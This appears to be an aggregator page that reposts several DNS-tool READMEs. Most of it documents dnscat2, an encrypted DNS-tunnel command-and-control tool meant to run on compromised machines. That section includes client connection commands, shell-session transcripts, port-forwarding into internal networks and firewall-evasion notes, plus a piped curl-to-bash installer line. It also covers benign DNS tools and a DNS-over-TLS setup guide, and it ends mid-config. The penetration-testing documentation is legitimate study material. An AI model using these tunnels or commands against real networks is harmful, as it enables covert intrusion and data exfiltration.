Quantcast
Channel: 看得透又看得远者prevail. ppt.cc/flUmLx ppt.cc/fqtgqx ppt.cc/fZsXUx ppt.cc/fhWnZx ppt.cc/fnrkVx ppt.cc/f2CBVx
Viewing all 20515 articles
Browse latest View live

dns代理服务器程序-dnscat2

$
0
0

Introduction

Welcome to dnscat2, a DNS tunnel that WON'T make you sick and kill you!
This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.
This README file should contain everything you need to get up and running! If you're interested in digging deeper into the protocol, how the code is structured, future plans, or other esoteric stuff, check out the doc/ folder.

Overview

dnscat2 comes in two parts: the client and the server.
The client is designed to be run on a compromised machine. It's written in C and has the minimum possible dependencies. It should run just about anywhere (if you find a system where it doesn't compile or run, please file a ticket, particularly if you can help me get access to said system).
When you run the client, you typically specify a domain name. All requests will be sent to the local DNS server, which are then redirected to the authoritative DNS server for that domain (which you, presumably, have control of).
If you don't have an authoritative DNS server, you can also use direct connections on UDP/53 (or whatever you choose). They'll be faster, and still look like DNS traffic to the casual viewer, but it's much more obvious in a packet log (all domains are prefixed with "dnscat.", unless you hack the source). This mode will frequently be blocked by firewalls.
The server is designed to be run on an authoritative DNS server. It's in ruby, and depends on several different gems. When you run it, much like the client, you specify which domain(s) it should listen for in addition to listening for messages sent directly to it on UDP/53. When it receives traffic for one of those domains, it attempts to establish a logical connection. If it receives other traffic, it ignores it by default, but can also forward it upstream.
Detailed instructions for both parts are below.

How is this different from .....

dnscat2 strives to be different from other DNS tunneling protocols by being designed for a special purpose: command and control.
This isn't designed to get you off a hotel network, or to get free Internet on a plane. And it doesn't just tunnel TCP.
It can tunnel any data, with no protocol attached. Which means it can upload and download files, it can run a shell, and it can do those things well. It can also potentially tunnel TCP, but that's only going to be added in the context of a pen-testing tool (that is, tunneling TCP into a network), not as a general purpose tunneling tool. That's been done, it's not interesting (to me).
It's also encrypted by default. I don't believe any other public DNS tunnel encrypts all traffic!

Where to get it

Here are some important links:
  • Sourcecode on Github
  • Downloads (you'll find signed Linux 32-bit, Linux 64-bit, Win32, and source code versions of the client, plus an archive of the server - keep in mind that that signature file is hosted on the same server as the files, so if you're worried, please verify my PGP key :) )
  • User documentation A collection of files, both for end-users (like the Changelog) and for developers (like the Contributing doc)
  • Issue tracker (you can also email me issues, just put my first name (ron) in front of my domain name (skullsecurity.net))

How to play

The theory behind dnscat2 is simple: it creates a tunnel over the DNS protocol.
Why? Because DNS has an amazing property: it'll make its way from server to server until it figures out where it's supposed to go.
That means that for dnscat to get traffic off a secure network, it simply has to send messages to a DNS server, which will happily forward things through the DNS network until it gets to your DNS server.
That, of course, assumes you have access to an authoritative DNS server. dnscat2 also supports "direct" connections - that is, running a dnscat client that directly connects to your dnscat on your ip address and UDP port 53 (by default). The traffic still looks like DNS traffic, and might get past dumber IDS/IPS systems, but is still likely to be stopped by firewalls.
If you aren't clear on how to set up an authoritative DNS server, it's something you have to set up with a domain provider.izhan helpfully wrote one for you!

Compiling

Client

Compiling the client should be pretty straight forward - all you should need to compile is make/gcc (for Linux) or either Cygwin or Microsoft Visual Studio (for Windows). Here are the commands on Linux:
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make
On Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit "build". I created and test it on Visual Studio 2008 - until I get a free legit copy of a newer version, I'll likely be sticking with that one. :)
If compilation fails, please file a bug on my github page! Please send details about your system.
You can verify dnscat2 is successfully compiled by running it with no flags; you'll see it attempting to start a DNS tunnel with whatever your configured DNS server is (which will fail):
$ ./dnscat
Starting DNS driver without a domain! This will only work if you
are directly connecting to the dnscat2 server.

You'll need to use --dns server= if you aren't.

** WARNING!
*
* It looks like you're running dnscat2 with the system DNS server,
* and no domain name!*
* That's cool, I'm not going to stop you, but the odds are really,
* really high that this won't work. You either need to provide a
* domain to use DNS resolution (requires an authoritative server):
*
* dnscat mydomain.com
*
* Or you have to provide a server to connect directly to:
*
* dnscat --dns=server=1.2.3.4,port=53
*
* I'm going to let this keep running, but once again, this likely
* isn't what you want!
*
** WARNING!

Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 4.2.2.1
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: The server hasn't returned a valid response in the last 10 attempts.. closing session.
[[ FATAL ]] :: There are no active sessions left! Goodbye!
[[ WARNING ]] :: Terminating

Server

The server isn't "compiled", as such, but it does require some Ruby dependencies. Unfortunately, Ruby dependencies can be annoying to get working, so good luck! If any Ruby experts out there want to help make this section better, I'd be grateful!
I'm assuming you have Ruby and Gem installed and in working order. If they aren't, install them with either apt-getemergervm, or however is normal on your operating system.
Once Ruby/Gem are sorted out, run these commands (note: you can obviously skip the git clone command if you already installed the client and skip gem install bundler if you've already installed bundler):
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install
If you get a permissions error with gem install bundler or bundler install, you may need to run them as root. If you have a lot of problems, uninstall Ruby/Gem and install everything using rvm and without root.
If you get an error that looks like this:
/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- mkmf (LoadError)
It means you need to install the -dev version of Ruby:
$ sudo apt-get install ruby-dev
I find that sudo isn't always enough to get everything working right, I sometimes have to switch to root and work directly as that account. rvmsudo doesn't help, because it breaks ctrl-z.
You can verify the server is working by running it with no flags and seeing if you get a dnscat2> prompt:
# ruby ./dnscat2.rb

New window created: 0
Welcome to dnscat2! Some documentation may be out of date.

passthrough => disabled
auto_attach => false
auto_command =>
process =>
history_size (for new windows) => 1000
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53

Of course, you have to figure out yourself! Clients
will connect directly on UDP port 53.

dnscat2>
If you don't run it as root, you might have trouble listening on UDP/53 (you can use --dnsport to change it). You'll see an error message if that's the case.

Ruby as root

If you're having trouble running Ruby as root, this is what I do to run it the first time:
$ cd dnscat2/server
$ su
# gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
# \curl -sSL https://get.rvm.io | bash
# source /etc/profile.d/rvm.sh
# rvm install 1.9
# rvm use 1.9
# bundle install
# ruby ./dnscat2.rb
And subsequent times:
$ cd dnscat2/server
$ su
# source /etc/profile.d/rvm.sh
# ruby ./dnscat2.rb
rvmsudo should make it easier, but dnscat2 doesn't play well with rvmsudo unfortunately.

Usage

Client + server

Before we talk about how to specifically use the tools, let's talk about how dnscat is structured. The dnscat tool is divided into two pieces: a client and a server. As you noticed if you went through the compilation, the client is written in C and the server is in Ruby.
Generally, the server is run first. It can be long lived, and handle as many clients as you'd like. As I said before, it's basically a C&C service.
Later, a client is run, which opens a session with the server (more on sessions below). The session can either traverse the DNS hierarchy (recommended, but more complex) or connect directly to the server. Traversing the DNS hierarchy requires an authoritative domain, but will bypass most firewalls. Connecting directly to the server is more obvious for several reasons.
By default, connections are automatically encrypted (turn it off on the client with --no-encryption and on the server with --security=open). When establishing a new connection, if you're paranoid about man-in-the-middle attacks, you have two options for verifying the peer:
  • Pass a pre-shared secret using the --secret argument on both sides to validate the connection
  • Manually verify the "short authentication string" - a series of words that are printed on both the client and server after encryption is negotiated

Running a server

The server - which is typically run on the authoritative DNS server for a particular domain - is designed to be feature-ful, interactive, and user friendly. It's written in Ruby, and much of its design is inspired by Metasploit and Meterpreter.
If you followed the compilation instructions above, you should be able to just run the server:
$ ruby ./dnscat2.rb skullseclabs.org
Where "skullseclabs.org" is your own domain. If you don't have an authoritative DNS server, it isn't mandatory; but this tool works way, way better with an authoritative server.
That should actually be all you need! Other than that, you can test it using the client's --ping command on any other system, which should be available if you've compiled it:
$ ./dnscat --ping skullseclabs.org
If the ping succeeds, your C&C server is probably good! If you ran the DNS server on a different port, or if you need to use a custom DNS resolver, you can use the --dns flag in addition to --ping:
$ ./dnscat --dns server=8.8.8.8,domain=skullseclabs.org --ping

$ ./dnscat --dns port=53531,server=localhost,domain=skullseclabs.org --ping
Note that when you specify a --dns argument, the domain has to be part of that argument (as domain=xxx). You can't just pass it on the commandline (due to a limitation of my command parsing; I'll likely improve that in a future release).
When the process is running, you can start a new server using basically the exact same syntax:
dnscat2> start --dns=port=53532,domain=skullseclabs.org,domain=test.com
New window created: dns2
Starting Dnscat2 DNS server on 0.0.0.0:53532
[domains = skullseclabs.org, test.com]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following:
./dnscat2 skullseclabs.org
./dnscat2 test.com

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53532

Of course, you have to figure out yourself! Clients
will connect directly on UDP port 53532.
You can run as many DNS listeners as you want, as long as they're on different hosts/ports. Once the data comes in, the rest of the process doesn't even know which listener data came from; in fact, a client can send different packets to different ports, and the session will continue as expected.

Running a client

The client - which is typically run on a system after compromising it - is designed to be simple, stable, and portable. It's written in C and has as few library dependencies as possible, and compiles/runs natively on Linux, Windows, Cygwin, FreeBSD, and Mac OS X.
The client is given the domain name on the commandline, for example:
./dnscat2 skullseclabs.org
In that example, it will create a C&C session with the dnscat2 server running on skullseclabs.org. If an authoritative domain isn't an option, it can be given a specific ip address to connect to instead:
./dnscat2 --dns host=206.220.196.59,port=5353
Assuming there's a dnscat2 server running on that host/port, it'll create a session there.

Tunnels

Yo dawg; I hear you like tunnels, so now you can tunnel a tunnel through your tunnel!
It is currently possible to tunnel a connection through dnscat2, similar to "ssh -L"! Other modes ("ssh -D" and "ssh -R") are coming soon as well!
After a session has started (a command session), the command "listen" is used to open a new tunnelled port. The syntax is roughly the same as ssh -L:
listen [lhost:]lport rhost:rport
The local host is option, and will default to all interfaces (0.0.0.0). The local port and remote host/port are mandatory.
The dnscat2 server will listen on lport. All connections received to that port are forwarded, via the dnscat2 client, to the remote host/port chosen.
For example, this will listen on port 4444 (on the server) and forward traffic to google:
listen 4444 www.google.com:80
Then, if you connect to http://localhost:4444, it'll come out the dnscat2 client and connect to google.com.
Let's say you're using this on a pentest and you want to forward ssh connections through the dnscat2 client (running on somebody's corp network) to an internal device. You can!
listen 127.0.0.1:2222 10.10.10.10:22
That'll only listen on the localhost interface on the dnscat2 server, and will forward connections via the tunnel to port 22 of 10.10.10.10.

Encryption

dnscat2 is encrypted by default.
I'm not a cryptographer, and by necessity I came up with the encryption scheme myself. As a result, I wouldn't trust this 100%. I think I did a pretty good job preventing attacks, but this hasn't been professionally audited. Use with caution.
There is a ton of technical information about the encryption in the protocol doc. But here are the basics.
By default, both the client and the server support and will attempt encryption. Each connection uses a new keypair, negotiated by ECDH. All encryption is done by salsa20, and signatures use sha3.
Encryption can be disabled on the client by passing --no-encryption on the commandline, or by compiling it using make nocrypto.
The server will reject unencrypted connections by default. To allow unencrypted connections, pass --security=open to the server, or run set security=open on the console.
By default, there's no protection against man-in-the-middle attacks. As mentioned before, there are two different ways to gain MitM protection: a pre-shared secret or a "short authentication string".
A pre-shared secret is passed on the commandline to both the client and the server, and is used to authenticate both the client to the server and the server to the client. It should be a somewhat strong value - something that can't be quickly guessed by an attacker (there's only a short window for the attacker to guess it, so it only has to hold up for a few seconds).
The pre-shared secret is passed in via the --secret parameter on both the client and the server. The server can change it at runtime using set secret=, but that can have unexpected results if active clients are connected.
Furthermore, the server can enforce only authenticated connections are allowed by using --security=authenticated or set security=authenticated. That's enabled by default if you pass the --secret parameter.
If you don't require the extra effort of authenticating connections, then a "short authentication string" is displayed by both the client and the server. The short authentication string is a series of English words that are derived based on the secret values that both sides share.
If the same set of English words are printed on both the client and the server, the connection can be reasonably considered to be secure.
That's about all you need to know about the encryption! See the protocol doc for details! I'd love to hear any feedback on the crypto, as well. :)
And finally, if you have any problems with the crypto, please let me know! By default a window called "crypto-debug" will be created at the start. If you have encryption problems, please send me that log! Or, better yet, run dnscat2 with the --firehose and --packet-trace arguments, and send me EVERYTHING! Don't worry about revealing private keys; they're only used for that one session.

dnscat2's Windows

The dnscat2 UI is made up of a bunch of windows. The default window is called the 'main' window. You can get a list of windows by typing windows (or sessions) into any command prompt:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = skullseclabs.org [*]
You'll note that there are two windows - window 0 is the main window, and window dns1 is the listener (technically referred to as the 'tunnel driver').
From any window that accepts commands (main and command sessions), you can type help to get a list of commands:
dnscat2> help

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
For any of those commands, you can use -h or --help to get details:
dnscat2> window --help
Error: The user requested help

Interact with a window
-i, --i= Interact with the chosen window
-h, --help Show this message
We'll use the window command to interact with dns1, which is a status window:
dnscat2> window -i dns1
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53531
[domains = skullseclabs.org]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following:
./dnscat2 skullseclabs.org

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53531

Of course, you have to figure out yourself! Clients
will connect directly on UDP port 53531.

Received: dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)
Sending: 9fa0ff178f72686d6c716c6376697968657a6d716800
Received: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org (MX)
Sending: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org
The received and sent strings there are, if you decode them, pings.
You can switch to the 'parent' window (in this case, main) by pressing ctrl-z. If ctrl-z kills the process, then you probably have to find a better way to run it (rvmsudo doesn't work, see above).
When a new client connects and creates a session, you'll be notified in main (and certain other windows):
New window created: 1
dnscat2>
(Note that you have to press enter to get the prompt back)
You can switch to the new window the same way we switched to the dns1 status window:
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command session (ubuntu-64) 1>
Command sessions can spawn additional sessions; for example, the shell command:
command session (ubuntu-64) 1> shell
Sent request to execute a shell
New window created: 2
Shell session created!

command session (ubuntu-64) 1>
(Note that throughout this document I'm cleaning up the output; usually you have to press enter to get the prompt back)
Then, if you return to the main session (ctrl-z or suspend, you'll see it in the list of windows:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]
Unfortunately, the 'windows' command in a specific command session only shows child windows from that session, and right now new sessions aren't spawned as children.
Note that some sessions have [*] - that means that there's been activity since the last time we looked at them.
When you interact with a session, the interface will look different depending on the session type. As you saw with the default session type (command sessions) you get a UI just like the top-level session (you can type 'help' or run commands or whatever). However, if you interact with a 'shell' session, you won't see much immediately, until you type a command:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]

dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (ubuntu-64) 2> pwd
/home/ron/tools/dnscat2/client
To escape this, you can use ctrl-z or type "exit" (which will kill the session).
Lastly, to kill a session, the kill command can be used:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]
dnscat2> kill 2
Session 2 has been sent the kill signal!
Session 2 has been killed
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)

History

In the past, there were several DNS tunneling tools. One was called dnscat, written by Tadek Pietraszek. The problem is, it's written in Java, and I really wanted something that could run basically everywhere.
That version of dnscat was based on a tool called NSTX, whose page no longer exists and isn't even in the Wayback Machine, so I know nothing about it.
Later, I wrote a C implementation and called it dnscat (without permission), since the previous Java version was unmaintained and I really liked the name (I toyed with calling it dnscat-ng, but -ng is a bit wordy for my taste). It worked, but there were a lot of problems. The client and server were the same tool, like netcat, which, because DNS is such a client/server model, didn't work out that well. The other problem was that I had linked it too much to the DNS protocol, so it could only run over DNS.
dnscat2 - the successor to dnscat - is an attempt to right some of the wrongs that I had committed. dnscat2 has a separate server (Ruby) and client (C) and treats everything as a stream of bytes, and uses a driver, of sorts, to convert that stream of bytes into dns requests and back. Thus, it's a layered protocol, with DNS being a lower layer.
As a result, I invented a protocol that I'm calling the dnscat protocol. You can find documentation about it in docs/protocol.md. It's a simple polling network protocol, where the client occasionally polls the server, and the server responds with a message (or an error code). The protocol is designed to be resilient to the various issues I had with dnscat1 - that is, it can handle out-of-order packets, dropped packets, and duplicated packets equally well.


动态dns服务-nsupdate.info

$
0
0
Dynamic DNS service 

About nsupdate.info

https://nsupdate.info is a free dynamic DNS service.
nsupdate.info is also the name of the software used to implement it. If you like, you can use it to host the service on your own server.
Documentation Build Status Test Coverage PyPI Package
(build and coverage are for latest repo code, package and downloads are for PyPI release)

Features


  • Frontend: Dynamic DNS updates via dyndns2 protocol (like supported by many DSL/cable routers and client software).
  • Backends:
    • Uses Dynamic DNS UPDATE protocol (RFC 2136) to update compatible nameservers like BIND, PowerDNS and others (the nameserver itself is not included).
    • Optionally uses the dyndns2 protocol to update other services - we can send updates to configurable third-party services when we receive an update from the router / update client.
  • Prominently shows visitor's IP addresses (v4 and v6) on main view, shows reverse DNS lookup results (on host overview view).
  • Multiple Hosts per user (using separate secrets for security)
  • Add own domains / nameservers (public or only for yourself)
  • Related Hosts: support updating DNS records of other hosts in same LAN by a single updater (e.g. for IPv6 with changing prefix, IPv4 also works)
  • Login with local or remote accounts (Google, GitHub, Bitbucket, ... accounts - everything supported by the python-social-auth package)
  • Manual IP updates via web interface
  • Browser-based update client for temporary/adhoc usage
  • Shows time since last update via API, whether it used TLS or not
  • Shows IP v4 and v6 addresses (from master nameserver records)
  • Shows client / server fault counters, available and abuse flags
  • Supports IP v4 and v6, TLS.
  • Easy and simple web interface, it tries to actively help to configure routers / update clients / nameservers.
  • Made with security and privacy in mind
  • No nagging, no spamming, no ads - trying not to annoy users
  • Free and open source software, made with Python and Django

Tutorial to setup DNS-over-TLS (DoT)

$
0
0
This guide will help you reuse your setup for DNS-over-HTTPS (DoH) to add support for DNS-over-TLS (DoT). The best part ? You won’t need new tools after you’ve followed my previous guides: DNS-over-HTTPS or Pihole and DoH.

Introduction

DNS-over-TLS (DoT) is different to DNS-over-HTTPS (DoH).
DoH is used in different application like DNScrypt, Intra, etc … In other words, there isn’t any OS implementation of it. You always need a separate app to use it.
DoT is used directly in Android 9 (Pie).
It’s important to note that in both case the traffic will be encrypted and your ISP or any company between you and the server won’t be able to see what are your DNS request. It’s only 2 different ways to do the same thing.

DNS-over-HTTPS (DoH)

In DoH, you’re using an HTTPS server to relay the DNS request to your DNS server. The request are encoded in a specific format, usually in JSON.
For more information, I advise you to check my DNS-over-HTTP Tutorial.

DNS-over-TLS (DoT)

DNS over TLS (DoT) is a security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks.
WIKIPEDIA
Basically, you’re going to encapsulate DNS traffic into a TLS stream to encrypt the request and use TCP instead of UDP. The default port is 853.

Tutorial

If you’ve followed already my guide on how to setup DoH, you have everything you need.
If you didn’t, I advise you to follow it to be able to easily generate an HTTPS certificate with Certbot. If you already have a certificate, great, you’re good to go.
If you don’t have a certificate ready, I recommend you to set it up with Certbot and DNS validation (like with CloudFlare) or to follow the DoH guide.

NGINX

NGINX is an amazing tool, not only it’s an HTTP server but can be used to encapsulate any stream into a TLS stream. This is exactly what we want.

Streams

First, you’ll need to create a new directory in your NGINX install directory to store the stream configuration.
  1. sudo mkdir /etc/nginx/streams/

TLS

Now get from the DoH NGINX’s site configuration file the path to your HTTPS key and certificate.
If you used Certbot, it’s gonna look like this where dns.aaflalo.me will be your domain.
  1. ssl_certificate /etc/letsencrypt/live/dns.aaflalo.me/fullchain.pem; # managed by Certbot
  2. ssl_certificate_key /etc/letsencrypt/live/dns.aaflalo.me/privkey.pem; # managed by Certbot
  3. ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
Now that you have the SSL configuration, we’re gonna create the stream configuration to redirect DoT traffic to your DNS server.

DNS-over-TLS

We create the dns-over-tls configuration and then you’ll use your favourite editor to set the content.
  1. /etc/nginx/streams/dns-over-tls
  1. upstream dns-servers {
  2. server 127.0.0.1:53;
  3. }
  4. server {
  5. listen 853 ssl; # managed by Certbot
  6. ssl_certificate /etc/letsencrypt/live/dns.aaflalo.me/fullchain.pem; # managed by Certbot
  7. ssl_certificate_key /etc/letsencrypt/live/dns.aaflalo.me/privkey.pem; # managed by Certbot
  8. ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
  9. ssl_protocols TLSv1.2 TLSv1.3;
  10. ssl_ciphers HIGH:!aNULL:!MD5;
  11. ssl_handshake_timeout 10s;
  12. ssl_session_cache shared:SSL:20m;
  13. ssl_session_timeout 4h;
  14. proxy_pass dns-servers;
  15. }
I’ve highlighted the lines you need to change for your own configuration. The server in dns-servers need to point to the DNS server you want to use. May it be your Pihole, or your DNSCrypt server, etc … You can put multiple server as well.

Activate Streams

Now the last step, is to tell NGINX to look into our /etc/nginx/streams folder to activate the stream.
Edit the file /etc/nginx/nginx.conf
And add the following piece of code into the file, after the HTTP block (or just at the end of the file)
  1. stream {
  2. include /etc/nginx/streams/*;
  3. }
Now you just need to restart NGINX, and you’ll have a DoT server listening on the port 853.
  1. sudo systemctl restart nginx

Firewall

Don’t forget to open the TCP port 853 on your firewall to be able to access the server.

Test

To test your DoT server, you can use the service provided by GetDNS.
GetDNS Interface
How to use the Querier
  1. Set Transport order
    Set it to TLS
  2. Set TLS resolver IP
    To the Public IP of your server
  3. TLS auth name
    To the FQDN (full name) of your server certificate. The one you used to generate the TLS certificate.
  4. Query
    Put the domain you want to query, like aaflalo.me or google.com and select A query.
  5. Push the button
    And check that there is a result


相关帖子

lexicon

$
0
0

Manipulate DNS records on various DNS providers in a standardized/agnostic way.
Circle CI Build status Coverage Status Docker Pulls PyPI PyPI GitHub license

Introduction

Lexicon provides a way to manipulate DNS records on multiple DNS providers in a standardized way. Lexicon has a CLI but it can also be used as a python library.
Lexicon was designed to be used in automation, specifically letsencrypt.

Providers

Only DNS providers who have an API can be supported by lexicon.
The current supported providers are:
Potential providers are as follows. If you would like to contribute one, follow the CONTRIBUTING.md and then open a pull request.
  • Azure DNS (docs)
  • AHNames (docs)
  • DurableDNS (docs) Can't set TXT records
  • cyon.ch
  • Dyn (docs💵 requires paid account
  • Dynu
  • DirectAdmin
  • EntryDNS (docs💵 requires paid account
  • FreeDNS (docs)
  • Host Virtual DNS (docs💵 requires paid account
  • HostEurope
  • Infoblox NIOS
  • ironDNS (docs💵 requires paid account
  • ISPConfig
  • InternetX autoDNS (docs)
  • Knot DNS
  • KingHost
  • Liquidweb (docs💵 requires paid account
  • Loopia (docs💵 requires paid account
  • Mythic Beasts(docs)
  • NFSN (NearlyFreeSpeech) (docs💵 requires paid account
  • RFC2136 (docs)
  • Servercow (docs)
  • selectel.com
  • TELE3 (docs)
  • UltraDNS (docs💵 requires paid account
  • UnoEuro API
  • VSCALE
  • WorldWideDns (docs💵 requires paid account
  • Zerigo (docs💵 requires paid account
  • Zoneedit (docs)
  • Any others I missed

Setup

Warning: it is strongly advised with pip to install Lexicon in a Python virtual environment, in order to avoid interference between Python modules preinstalled on your system as OS packages and modules installed by pip (see https://docs.python-guide.org/dev/virtualenvs/).
To use lexicon as a CLI application, do the following:
pip install dns-lexicon
Some providers (like Route53 and TransIP) require additional dependencies. You can install provider specific dependencies separately:
pip install dns-lexicon[route53]
To install lexicon with the additional dependencies of every provider, do the following:
pip install dns-lexicon[full]
You can also install the latest version from the repository directly.
pip install git+https://github.com/AnalogJ/lexicon.git
and with Route 53 provider dependencies:
pip install git+https://github.com/AnalogJ/lexicon.git#egg=dns-lexicon[route53]
As an alternative you can also install Lexicon using the OS packages available for major Linux distributions (see lexiconor dns-lexicon package in https://pkgs.org/download/lexicon).

Usage

$ lexicon -h
usage: lexicon [-h] [--version] [--delegated DELEGATED]
{cloudflare,cloudxns,digitalocean,dnsimple,dnsmadeeasy,dnspark,dnspod,easydns,luadns,namesilo,nsone,pointhq,rage4,route53,vultr,yandex,zonomi}
...

Create, Update, Delete, List DNS entries

positional arguments:
{cloudflare,cloudxns,digitalocean,dnsimple,dnsmadeeasy,dnspark,dnspod,easydns,luadns,namesilo,nsone,pointhq,rage4,route53,vultr,yandex,zonomi}
specify the DNS provider to use
cloudflare cloudflare provider
cloudxns cloudxns provider
digitalocean digitalocean provider
...
rage4 rage4 provider
route53 route53 provider
vultr vultr provider
yandex yandex provider
zonomi zonomi provider

optional arguments:
-h, --help show this help message and exit
--version show the current version of lexicon
--delegated DELEGATED
specify the delegated domain


$ lexicon cloudflare -h
usage: lexicon cloudflare [-h] [--name NAME] [--content CONTENT] [--ttl TTL]
[--priority PRIORITY] [--identifier IDENTIFIER]
[--auth-username AUTH_USERNAME]
[--auth-token AUTH_TOKEN]
{create,list,update,delete} domain
{A,AAAA,CNAME,MX,NS,SPF,SOA,TXT,SRV,LOC}

positional arguments:
{create,list,update,delete}
specify the action to take
domain specify the domain, supports subdomains as well
{A,AAAA,CNAME,MX,NS,SPF,SOA,TXT,SRV,LOC}
specify the entry type

optional arguments:
-h, --help show this help message and exit
--name NAME specify the record name
--content CONTENT specify the record content
--ttl TTL specify the record time-to-live
--priority PRIORITY specify the record priority
--identifier IDENTIFIER
specify the record for update or delete actions
--auth-username AUTH_USERNAME
specify email address used to authenticate
--auth-token AUTH_TOKEN
specify token used authenticate
Using the lexicon CLI is pretty simple:
# setup provider environmental variables:
export LEXICON_CLOUDFLARE_USERNAME="myusername@example.com"
export LEXICON_CLOUDFLARE_TOKEN="cloudflare-api-token"

# list all TXT records on cloudflare
lexicon cloudflare list example.com TXT

# create a new TXT record on cloudflare
lexicon cloudflare create www.example.com TXT --name="_acme-challenge.www.example.com." --content="challenge token"

# delete a TXT record on cloudflare
lexicon cloudflare delete www.example.com TXT --name="_acme-challenge.www.example.com." --content="challenge token"
lexicon cloudflare delete www.example.com TXT --identifier="cloudflare record id"

Authentication

Most supported DNS services provide an API token, however each service implements authentication differently. Lexicon attempts to standardize authentication around the following CLI flags:
  • --auth-username - For DNS services that require it, this is usually the account id or email address
  • --auth-password - For DNS services that do not provide an API token, this is usually the account password
  • --auth-token - This is the most common auth method, the API token provided by the DNS service
You can see all the --auth-* flags for a specific service by reading the DNS service specific help: lexicon cloudflare -h

Environmental Variables

Instead of providing Authentication information via the CLI, you can also specify them via Environmental Variables. Every DNS service and auth flag maps to an Environmental Variable as follows: LEXICON_{DNS Provider Name}_{Auth Type}
So instead of specifying --auth-username and --auth-token flags when calling lexicon cloudflare ..., you could instead set the LEXICON_CLOUDFLARE_USERNAME and LEXICON_CLOUDFLARE_TOKEN environmental variables.

Letsencrypt Instructions

Lexicon has an example dehydrated hook file that you can use for any supported provider. All you need to do is set the PROVIDER env variable.
PROVIDER=cloudflare dehydrated --cron --hook dehydrated.default.sh --challenge dns-01
Lexicon can also be used with Certbot and the included Certbot hook file (requires configuration).

TroubleShooting & Useful Tools

There is an included example Dockerfile that can be used to automatically generate certificates for your website.

ToDo list

  •  Create and Register a lexicon pip package.
  •  Write documentation on supported environmental variables.
  •  Wire up automated release packaging on PRs.
  •  Check for additional dns hosts with apis (from fogdnsperflibcloud)
  •  Get a list of Letsencrypt clients, and create hook files for them (letsencrypt clients)
from https://github.com/AnalogJ/lexicon
----

DNS as code - Tools for managing DNS across multiple providers

In the vein of infrastructure as code OctoDNS provides a set of tools & patterns that make it easy to manage your DNS records across multiple providers. The resulting config can live in a repository and be deployed just like the rest of your code, maintaining a clear history and using your existing review & workflow.
The architecture is pluggable and the tooling is flexible to make it applicable to a wide variety of use-cases. Effort has been made to make adding new providers as easy as possible. In the simple case that involves writing of a single classand a couple hundred lines of code, most of which is translating between the provider's schema and OctoDNS's. More on some of the ways we use it and how to go about extending it below and in the /docs directory.
It is similar to Netflix/denominator.

Table of Contents

Getting started

Workspace

Running through the following commands will install the latest release of OctoDNS and set up a place for your config files to live. To determine if provider specific requirements are necessary see the Supported providers table below.
$ mkdir dns
$ cd dns
$ virtualenv env
...
$ source env/bin/activate
$ pip install octodns
$ mkdir config

Config

We start by creating a config file to tell OctoDNS about our providers and the zone(s) we want it to manage. Below we're setting up a YamlProvider to source records from our config files and both a Route53Provider and DynProvider to serve as the targets for those records. You can have any number of zones set up and any number of sources of data and targets for records for each. You can also have multiple config files, that make use of separate accounts and each manage a distinct set of zones. A good example of this this might be ./config/staging.yaml & ./config/production.yaml. We'll focus on a config/production.yaml.
---
providers:
config:
